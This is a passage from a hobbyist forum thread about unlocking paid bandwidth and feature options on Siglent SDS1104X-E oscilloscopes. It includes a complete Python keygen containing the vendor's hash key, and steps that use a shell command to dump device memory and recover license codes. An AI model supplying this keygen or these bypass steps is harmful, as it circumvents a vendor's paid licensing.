The ONLY issue I had was the understanding that EACH NETWORK COMMAND NEEDED TO BE ISSUED ONE AT A TIME.
The bandwidth expansion command I found VERY particular and would not be accepted until I shut down and rebooted the scope and then upon reboot enter the specific 200M code as per the step by step guide earlier in this thread.

Anyway I can confirm it certainly works on this new firmware and unit. I am waiting for an unknown revision TPLink Wifi Dongle to test that and hope its a Golden Rev v3. I hope to get the MSO add on l8r this year to test.

Thanks again everybody
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #189 on: July 23, 2020, 08:28:43 pm »
What really annoyed me was, that the scope detected and displayed the SSID with the space character and it could be selected.
So it really did not look like the space was the problem and lead me to search everywhere else...



WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.

Your protests will fall on deaf ears.  I have tried to explain numerous times that this limitation is insane, and SSIDs with spaces, special characters, capital letters, etc are the norm and all I hear back is some variant of "change ur SSID LOL" or "millions of devices dont work with spaces".

This scope runs on linux.  Every linux distribution has the ability to accept spaces and special characters in the SSID. Siglent needs to fix this.  It is insane to limit this scope in such a fundamental, easily fixable way.
 

Offline pcc_37

  • Newbie
  • Posts: 2
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #190 on: July 28, 2020, 12:51:14 am »
My Wi Fi dongle arrived and after setup and selection of DHCP, joining the correct SSID and entry of passkey, it joined my network just fine.

You should then observe the Classic Wifi ICON appear on the lower right corner of your display to the right of your USB drive connected icon.

Any issues you might have will be due to either the revision of the TP Link dongle OR the specific hardware of your home Access Point and the TP Link dongle.

Its a bit slow on my network but it defintely works.

Cheers
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #191 on: July 30, 2020, 12:07:52 am »
Every linux distribution has the ability to accept spaces and special characters in the SSID.

it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #192 on: July 30, 2020, 08:29:44 am »
it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.

That would explain the thing. Riskier to solve.
 

Offline cesc

  • Newbie
  • Posts: 1
  • Country: es
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #193 on: August 04, 2020, 04:55:17 pm »
Hi guys.

Regarding the differents options for SDS1104X-E, can somebody explain what is the meaning for all of them?

There are some of them that are quite trivial (WIFI, AWG - Arbitrary Waveform Generator, MSO and 16LA are related with the Logic Analyzer function), but what about the others options? MAX, FLX, CFD, I2S, 1553 & FG. Are some of them options for the SDS1104X-E?

Thanks for your help.

 

Offline Striker

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #194 on: August 05, 2020, 11:52:42 pm »
I had no issues with the linked Python scripts and it's running wonderfully. It definitely falls short of the scopes at work but it's still quite nice and a nice step up from the 1054Z. The web interface is surprisingly fluid.

It's just a shame such a tremendously limiting wifi bug still exists. I'm planning to get a switch for my bench anyway but the wifi is nice for testing in random areas of the house. If I had actually paid for the unlock I'd be pissed.
 

Online DEV001

  • Contributor
  • Posts: 17
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #195 on: August 06, 2020, 01:32:11 am »
Hi guys.

Regarding the differents options for SDS1104X-E, can somebody explain what is the meaning for all of them?

There are some of them that are quite trivial (WIFI, AWG - Arbitrary Waveform Generator, MSO and 16LA are related with the Logic Analyzer function), but what about the others options? MAX, FLX, CFD, I2S, 1553 & FG. Are some of them options for the SDS1104X-E?

Thanks for your help.

This post should help.
https://www.eevblog.com/forum/testgear/unlocking-siglent-sds1104x-e-step-by-step/msg3055026/#msg3055026
 

Offline HamNerd

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #196 on: August 07, 2020, 05:28:27 pm »
Hi Guys

I just received my new SDS1104X-E and I tried to unlock it as to the script but it did not take  my scope has the new software version 6.1.35R2. Anyone else having this problem with the new software release? Did they read these posts and fix their software? 
 

Offline fisherktm

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #197 on: August 09, 2020, 04:56:47 pm »
Hi Guys

I just received my new SDS1104X-E and I tried to unlock it as to the script but it did not take  my scope has the new software version 6.1.35R2. Anyone else having this problem with the new software release? Did they read these posts and fix their software? 


I also just picked up the SDS1104X-E with version 6.1.35R2 and initially had problems unlocking the 200 MHz BW feature using the Python script. After a couple of tries I realized the ScopeID had lower case letters and I was using uppercase letters in the Python script. Once I modified to the lower case letters, It worked just fine.  I also ordered the WiFi adapter TP-Link TL-WN725N and I confirm that works and the unlock code generated from the Python script.
This is a very nice upgrade from my Tek 2213a
« Last Edit: August 09, 2020, 04:59:09 pm by fisherktm »
 

Offline Not_Sure

  • Newbie
  • Posts: 4
  • Country: us
Thanks! Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #198 on: August 11, 2020, 02:10:13 am »
Thanks to all!! 
My new SDS1104X-E is happly upgraded: 200MHz, AWG, WIFI, MSO.

I first tried the Python script values.  They worked for AWG, WIFI, MSO.  I simply typed them into the front panel in upgrade mode.  Python script value did not work for 200MHz and the value it genereated for 100MHz did not agree with what the scope reported back from MCBD? command. (I tried 3 versions of the python script posted at various "know good" places and none worked??)

After installing EasyScope and National Instruments NI-VIEW, per Siglent instructions I could run commands from both an IP address browser connection and the SCPI button (better), or NI-MAX (the name that NI-VIEW created under my Win7 start menu, worse)

I could not execute shellcmd, or connect via any interface that would allow me to execute needed cmds so I downrev'ed the Firmware to 6.1.26.  This was trivial, so was restoring to 6.1.35R2 (what came on the scope).

Once running 6.1.26 I connected to the oscilloscope with the web interface (via LAN), and used the command "SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin" to copy  memdump.bin to USB drive.

Using a hex editor I searched....  Best for me was searching for the 100M key I read with MCBD? command.  Between the only two instances of the 100MHz key in the membump.bin file there appeared 3, 16 character ASCII codes.  I tried the first one with MCBD command and all was well.

Verified with PRBD? command which happily responded with "200M".  At this point the System Status reports it's a SDS1204X-E as well.

Reflashed back to  6.1.35R2 and smiled.

Again thanks to all who have contributed to the understanding contained herein. 

 

Offline Coyote

  • Contributor
  • Posts: 10
  • Country: si
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #199 on: August 12, 2020, 08:02:53 am »
I have upgraded my SDS1104X-E to latest firmware from Siglent website: 6.1.35R2. Then I have followed instructions regarding python script, used an online script:  https://repl.it/repls/GainsboroAlienatedText#main.py


Code: [Select]
import hashlib

SCOPEID = '0123456789abcdef'
SN = 'SDSMMEBD3R4444'
Model = 'SDS1000X-E'
          # 'SDS1000X-E', 'SDS2000X-E', 'SDS2000X+', 'SDS5000X', 'ZODIAC-'

bwopt = ('25M', '40M', '50M', '60M', '70M', '100M', '150M', '200M', '250M', '300M', '350M', '500M', '750M', '1000M', 'MAX')
otheropt = ('AWG', 'WIFI', 'MSO', 'FLX', 'CFD', 'I2S', '1553', 'FG', '16LA')

hashkey = '5zao9lyua01pp7hjzm3orcq90mds63z6zi5kv7vmv3ih981vlwn06txnjdtas3u2wa8msx61i12ueh14t7kqwsfskg032nhyuy1d9vv2wm925rd18kih9xhkyilobbgy'

def gen(x):
h = hashlib.md5((
hashkey +
(Model+'\n').ljust(32, '\x00') +
opt.ljust(5, '\x00') +
2*(((SCOPEID if opt in bwopt else SN) + '\n').ljust(32, '\x00')) +
'\x00'*16).encode('ascii')
).digest()
key = ''
for b in h:
if (b <= 0x2F or b > 0x39) and (b <= 0x60 or b > 0x7A):
m = b % 0x24
b = m + (0x57 if m > 9 else 0x30)
if b == 0x30: b = 0x32
if b == 0x31: b = 0x33
if b == 0x6c: b = 0x6d
if b == 0x6f: b = 0x70
key += chr(b)
return key.upper()

for opt in bwopt:
print('{:5} {}'.format(opt, gen(SCOPEID)))
for opt in otheropt:
print('{:5} {}'.format(opt, gen(SN)))

In SCPI command window I have executed SCOPEID? and replaced the SCOPEID in python script without spaces. The I have executed *IDN? and got the serial number SDSxxxxx of the scope, also replaced the SN in pyton script. Executed and got codes for 200M, AWG, MSO, WIFI . First I have inserted the 200M krx  in the SCPI window with : MCBD 200M_code, then restarted the DSO. I have entered the option codes directly in the scope UI. DSO accepted all of them.
 
The following users thanked this post: Sinatek

Offline Not_Sure

  • Newbie
  • Posts: 4
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #200 on: August 18, 2020, 07:34:30 pm »
Just for giggles I tried the python script Coyote referenced, https://repl.it/repls/GainsboroAlienatedText#main.py and inline above, and that one generated correct 100M and 200M codes for my scope. 

I recommend anyone trying an upgrade use the above referenced python script! (as of Aug. 2020)   :-+
« Last Edit: August 18, 2020, 07:36:07 pm by Not_Sure »
 

Offline RichardM

  • Contributor
  • Posts: 22
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #201 on: October 08, 2020, 02:00:11 am »
Can you undo the 200mhz upgrade? My scope tends to become slow and unresponsive with more than 2 probes capturing data. I did not notice this issue previously when at 100mhz ?. Cheers.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #202 on: October 08, 2020, 06:24:10 am »
Can you undo the 200mhz upgrade? My scope tends to become slow and unresponsive with more than 2 probes capturing data. I did not notice this issue previously when at 100mhz ?. Cheers.
Shouldn't affect it at all.
Suggest you press Default to clear any previous settings that might be running in the background that are possibly affecting performance.

Oh and BTW, please use the correct units MHz not milli Hertz.
Avid Rabid Hobbyist
 

Offline RichardM

  • Contributor
  • Posts: 22
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #203 on: October 08, 2020, 07:02:38 am »
Ok, thanks I will try that.

MHz it is :)
 

Offline skoehler

  • Contributor
  • Posts: 26
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #204 on: October 14, 2020, 12:16:39 am »
Thinking about buying SDS1104x-e vs. SDS1204x-e. German seller list that the former comes with PP510 probes (100MHz) while the latter comes with PP215 proves (200MHz).
Is the 200MHz hack for the SDS1104x-e even worth it without proper probes?
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #205 on: October 14, 2020, 03:59:47 am »
Thinking about buying SDS1104x-e vs. SDS1204x-e. German seller list that the former comes with PP510 probes (100MHz) while the latter comes with PP215 proves (200MHz).
Is the 200MHz hack for the SDS1104x-e even worth it without proper probes?

Of course it is.  It really do not mean PP510 stop just 100MHz. Difference between PP215 and PP510 is not just like simple 1:2.


Somehow it looks that PP215 building quality is perhaps bit better than PP510. But freq response... if you do not know it is PP510 and 100MHz then with SDS1204X-E you do not really  notice you are using 100MHz probes (If I mark your PP510 as PP215 and you do not know I have done it...  I believe in practice in your use you use them happy without thinking they are not ok in freq response.  Much much more important is how you use probes. This need knowledge and skill when working around and over 100MHz.

Also why think only probes come with scope. If you do any kind of serious things later you need many kind of probes and probes are also continuously wearing.
Some times you may use coaxial cable for signal... some times perhaps some very excellent coaxial DIY probe what have very good edge response etc etc what goes very far over 200MHz scope performace. 


Look this thread for @Performa01 made probe tests
https://www.eevblog.com/forum/testgear/siglent-sds1104x-e-in-depth-review/msg1434665/#msg1434665



@Performa01 made test with scope  SDS1202X-E and probes



@Performa01 made tests probe itself.


Do you still thing if PP510 is limiting something. It is nearly nonsense if you get PP215 or PP510 when thinking frequency response alone. Oh well with PP215 you get GND spring... so you do not need disturb high freq signal or edge using Probe long GND wire what is common mistake even with low grade professionals. Probe long GND wire is for "audio" or low HF freq signals.


« Last Edit: October 14, 2020, 04:06:09 am by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #206 on: October 15, 2020, 09:06:25 pm »
Hi guys, I just wanted to know if for the SDS1104E-X (hacked or not) an update from 6.1.33 to 6.1.35R2 gives real advantages. I read here that the bandwidth and options hacking is no problem, but is it really worth to update? There are no new features really, are there? I am also using my own AVG with WiFi remote for the Bode plot, which I fear may no longer work after...

anyone? Buehler, Buehler ...
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #207 on: October 15, 2020, 09:31:09 pm »
Hi guys, I just wanted to know if for the SDS1104E-X (hacked or not) an update from 6.1.33 to 6.1.35R2 gives real advantages. I read here that the bandwidth and options hacking is no problem, but is it really worth to update? There are no new features really, are there? I am also using my own AVG with WiFi remote for the Bode plot, which I fear may no longer work after...

anyone? Buehler, Buehler ...
:-//
Maybe you haven't looked at the FW release notes ?
Click on them on this page:
https://int.siglent.com/download/firmwares/?ProId=12
Avid Rabid Hobbyist
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #208 on: October 16, 2020, 03:03:55 am »
SDS1xx4X-E-Firmware-Revise-History-and-Update-Instructions.pdf

BodePlot works better with new FW. It repairs some timing problem between generator and scope.
Rev list position 11.
Also some other improvements and handfull of bugfixes in many separate area in system.

And if problems, you have opportunity to return back to older FW until third party generator control software spaghetti is fixed.
« Last Edit: October 16, 2020, 03:31:49 am by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline xthanhn

  • Contributor
  • Posts: 9
  • Country: vn
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #209 on: November 09, 2020, 10:48:28 pm »
Every linux distribution has the ability to accept spaces and special characters in the SSID.

it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.
Hi Mr.Tinhead. Please check your inbox. I have sent you a message to help me with brick DSO1062B. Thank you very much!
 

Offline sulzer

  • Newbie
  • Posts: 1
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #210 on: December 22, 2020, 01:52:57 pm »
I just received my sds1104X-E scope, firmaware 6.1.35R2
Hack carried out 200mhz and all options.   :clap:
A big thank you to all for sharing
Connected via LAN, everything is fine.
Connected in wifi with the TP-Link N150 v3 key, it gets complicated.
It works as long as the SSID is visible and not hidden!
Unbelievable.
My SSID contains lowercase and uppercase, I thought the problem came from there. But no.
So for me two solutions to use WebServer remotely:
- LAN provided that I connect directly to the router and not directly to the PC.
- WiFi on condition of making visible the SSID of my network.

Siglent an update to correct this. Not great for security.
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #211 on: December 22, 2020, 02:03:43 pm »
Almost any wifi tool can discover an hidden ssid, i find it only useful for make your life more difficult. If you really want to protect your wifi change password often, that is enough difficult, and MAYBE blocking mac address (but also this one can bypassed). Can be also turned off when it's not needed based on a time schedule.
In any case, it need to be fixed, but before it's better that they fix the connectivity issues while using dhcp. I like to use dhcp reservations for my network...
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #212 on: December 22, 2020, 02:09:19 pm »
Unfortunately this doesn't seem to be a priority issue for them, as this issue has been known for more than a year now.  At this point it seems to be more feature than bug, sadly.

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #213 on: December 29, 2020, 11:18:03 pm »
Dear all,
First of all sorry for my english.
I have read with attention all this post.
I've got an SDS2304X scope with purchased decode option.
I would like to unlock AWG option on my scope, i know that those explanation apply to X-E series.
I tried "SHELLCMD" SCPI command without any success (even with the oldest firmware on siglent website ...) it seems that thsi backdoor never existed on X series ...
I also tried this keygenerator without any success => https://repl.it/@wgoeo/siglent-keygen#main.py (generated key from Serial number is rejected with bad license key message)
Does anybody can help me to hack my scope ?

Thank's a lot for help.

Atum
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #214 on: December 31, 2020, 09:59:40 am »
Have you forked the repo? I've gone crazy before discovering that the code got without account/fork wasn't valid. And backup your original code...
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #215 on: December 31, 2020, 02:21:16 pm »
Thanks a lot for your response.
I was not logged. I tried and generated keys still fail.

it seems thas for awg option, only serial number and model matters

Quote
for opt in otheropt:
    print('{:5} {}'.format(opt, gen(SN)))

I entered the SN in upper case (14 chars)
for MODEL, i tried two things:
Model = 'SDS2304X'
Model = 'SDS2000X'

I entered generated keys in upper case in the scope GUI, in both cases, it fails.

Atum
« Last Edit: December 31, 2020, 02:23:11 pm by atum »
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #216 on: December 31, 2020, 02:24:21 pm »
Have you put in the "Scope ID" from your scope?
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #217 on: December 31, 2020, 02:37:03 pm »
Gentlemen, X licenses are similar but very different algo.

Also, @atum, SDS X are Blackfin machines with no filesystem. There is no place to telnet into.
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #218 on: December 31, 2020, 02:43:24 pm »
Yes i also put the scope ID in lowercase without "-"
But, no mater the value, generated key is the same.

Ok understood, the algo is different, does it means that it is impossible to hack ?

Atum
« Last Edit: December 31, 2020, 02:45:25 pm by atum »
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #219 on: January 01, 2021, 07:30:12 am »
I suspect that only the following models are supported: 'SDS1000X-E', 'SDS2000X-E', 'SDS2000X+', 'SDS5000X', 'ZODIAC-'

Found this: https://www.eevblog.com/forum/testgear/siglent-sds2000x-hack/
« Last Edit: January 01, 2021, 07:33:51 am by masterx81 »
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #220 on: January 02, 2021, 03:12:58 pm »
Thanks for reponse.
It seems that SDS2000X series are not "crakable"
The only thing people did is the bandwith option ...
I will try to post on the other topic !

atum
 

Offline skoehler

  • Contributor
  • Posts: 26
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #221 on: January 11, 2021, 11:22:19 pm »
I have a SDS1204X-E running firmware 6.1.35R2. I tried the script posted by Coyote above. As you can see from the source, the option codes don't depend on the SCOPEID, only on the SN. (This makes sense, as it must be convenient for customers to order their option codes, and customers won't know about the SCOPEID.) So I took the serial number the scope UI (SDSMMExxxxxxxx) and put it into the python script.

The option codes don't seem to work when entering them in the scope UI.

I wonder whether I need to use a different model string. Maybe the script only works for the SDS1104X-E?
« Last Edit: January 11, 2021, 11:28:48 pm by skoehler »
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #222 on: January 20, 2021, 03:09:43 am »
Hi everyone. 
I'm new to the forum (to post), but have been reading it for a while.  Lots of guidance that got me to purchase a new shiny SDS1004X-E.
I attempted to do the BW upgrade with the python code (thanks for the simple instructions) but the key did not take.
I noticed the 100M key generated by the python code is different than the 100M key I get with MCBD? command.  From what I read, this means the 200M code wont - and I can confirm - it doesn't.
Wondering if there is an updated version, or alternate version of the python code.
This is the one I tried:  https://repl.it/@wgoeo/siglent-keygen#main.py
The links provided to the other 2 are broken.  I get get an error that the Repl "is up for grabs".
These are the ones that don't seem to exist: https://repl.it/repls/GainsboroAlienatedText#main.py
and: https://repl.it/repls/JauntyAccurateGraphics

My FW is 6.1.35R2

I'd really appreciate any help... link to newer / updated python code etc...

thanks!
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #223 on: January 20, 2021, 03:11:46 am »
Yup - same issue.
Wondering if there is an updated python code.
(see my previous post)
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #224 on: January 20, 2021, 03:21:39 am »
I just received my sds1104X-E scope, firmaware 6.1.35R2
Hack carried out 200mhz and all options.   :clap:
A big thank you to all for sharing
Connected via LAN, everything is fine.
Connected in wifi with the TP-Link N150 v3 key, it gets complicated.
It works as long as the SSID is visible and not hidden!
Unbelievable.
My SSID contains lowercase and uppercase, I thought the problem came from there. But no.
So for me two solutions to use WebServer remotely:
- LAN provided that I connect directly to the router and not directly to the PC.
- WiFi on condition of making visible the SSID of my network.

Siglent an update to correct this. Not great for security.

may I ask to which python code did you use?.. I tried the upgrade and it didnt work.  tripple checked everything.
 

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #225 on: January 20, 2021, 04:39:11 am »
I figured it out.   from: |O   to: :-+

There were 2 issues:
First off - running the python code remotely in that link's website didnt work for me.  I copied the code and ran it in this on-line python execution website: https://www.programiz.com/python-programming/online-compiler/
it then returned the correct keys.

Secondly, the correct command in SCPI is: MCBD key........ not MCBD 200MHzkey
I thought the 200MHz had to be there as a prefix to the key... but that's not the case.  I see what the OP meant... ie "use the 200MHz key" in that place, but the way it's written, i mistook it as needing that "200MHz" prefix.

cheers!
« Last Edit: January 20, 2021, 04:40:42 am by wally2q »
 

Offline Roger Hartmann

  • Newbie
  • Posts: 1
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #226 on: January 22, 2021, 10:04:25 am »
hello all,

I used the above python script and successfully generated the codes for the Teledyne LeCroy T3DSO1104 (which is the same HW as the Siglent).

The AWG, WIFI and MSO upgrades I can check in the GUI itself. But for the 200MHz upgrade - beside of the "success" return from the SCPI MCBD command, how can I tell if it worked? Beside doing measurements, of course.

thanks a lot, Roger
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #227 on: January 22, 2021, 11:15:30 am »
The only "beside" is entering the equipment and see the BW license file to check its contents.
 
The following users thanked this post: Roger Hartmann

Offline wally2q

  • Contributor
  • Posts: 6
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #228 on: January 22, 2021, 03:10:28 pm »
On the Siglent, you can check the model-number in the "information" page - you will notice the 1204 model - depicting the 200mhz version vs the 100mhz which is model 1104.
This will validate that the unit "thinks" it's a 200mhz unit.

Secondly, if you turn the "horizontal" knob, you will be able to get 1 or 2 more settings, down to 1ns per division, whereas the 100mhz unit only goes to 5ns I believe.

Lastly, as far as actual performance, there may be different low-pass filters setpoints for 100mhz versus 200mhz - someone that may have done some actual tests can confirm this.

From a sampling rate, quality of data etc - there is no difference - the same data is presented to the processor, from the A-D.  1GS/s shared per 2 channels (2 A-D's for the 4 channels).  So no more "data" is available... so it only comes down to how the data is used / processed etc. 

Best way to think about it is this way:  this is a native 200mhz device, that was "throttled down" to 100mhz to fit a market-space... rather than a 100mhz device that is "stretched" to 200mhz

 
The following users thanked this post: Roger Hartmann

Offline peter2

  • Contributor
  • Posts: 8
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #229 on: January 24, 2021, 11:37:22 am »
i have the sds 1104x-e in pro mode,the screen says sds1204x-e and the horizon scale is now 1.00ns.
now i will disable the pro mode,to get the keys from the memorydump.bin file.
how dissable the pro mode?
and are all the options also free in the pro mode?
 

Offline Pugduck

  • Newbie
  • Posts: 3
  • Country: za
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #230 on: January 30, 2021, 05:10:04 am »
Hi, wonder if anyone experienced the same.. I ran the python web interface to generate the 200M bandwidth key for my Siglent 1104x-e scope.
The python app generated 4 possible codes which i tried but none of them worked. I know this as each time i ran a key, I queried it by MBCD? and then my existing key was returned.
Any help would be appreciated. ^-^
 

Offline Pugduck

  • Newbie
  • Posts: 3
  • Country: za
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #231 on: January 30, 2021, 05:27:13 am »
Sorry had a typo in previous post, ment MCBD instead of MBCD :phew:
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #232 on: January 30, 2021, 10:16:36 am »
When you are able to generate your current license, then you can be sure you are using the keygen correctly.
 

Offline thaistatos

  • Contributor
  • Posts: 18
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #233 on: January 30, 2021, 11:22:42 am »
Hi, wonder if anyone experienced the same.. I ran the python web interface to generate the 200M bandwidth key for my Siglent 1104x-e scope.
The python app generated 4 possible codes which i tried but none of them worked. I know this as each time i ran a key, I queried it by MBCD? and then my existing key was returned.
Any help would be appreciated. ^-^
check here:
https://www.eevblog.com/forum/testgear/unlocking-siglent-sds1104x-e-step-by-step/200/

you have to enter bandwith update by MCBD command, all other updates directly on the scope. first select the option you want to update and then enter the code.
 

Offline jorgemef

  • Newbie
  • Posts: 3
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #234 on: February 21, 2021, 01:03:40 am »
I also had multiple problems people are reporting, and after reading a lot I found the solution. I had to downgrade first. :) Latest version doesn't supports telnet enabling nor some scpi commands.
 


Share me

Digg  Facebook  SlashDot  Delicious  Technorati  Twitter  Google  Yahoo
Smf